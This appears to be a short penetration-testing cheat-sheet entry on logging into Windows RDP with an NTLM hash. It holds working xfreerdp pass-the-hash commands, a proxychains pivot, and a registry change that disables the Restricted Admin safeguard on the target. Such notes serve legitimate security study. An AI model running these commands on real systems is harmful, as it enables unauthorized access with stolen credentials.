RDP login with NTLM Hash

RDP login using NTLM Hash is absolutely possible. Just keep in mind that the target RDP port must be reachable from our Parrot attacking machine. So if we have a valid NTLM Hash of any user (Mostly Admin), we can use that hash to login through RDP using xfreerdp:

xfreerdp /u:admin /pth:2892d26cdf84d7a70e2eb3b9f05c425e /v:192.168.69.6 /cert-ignore

Enable RDP pass the hash on the Target Machine for example purpose:

New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force

Then to pass the hash with RDP to Target_Machine:

proxychains xfreerdp /v:172.16.X.194 /u:administrator /pth:f99529e42ee77dc4704c568ba9320a34 +compression +clipboard /dynamic-resolution +toggle-fullscreen /cert-ignore

Last updated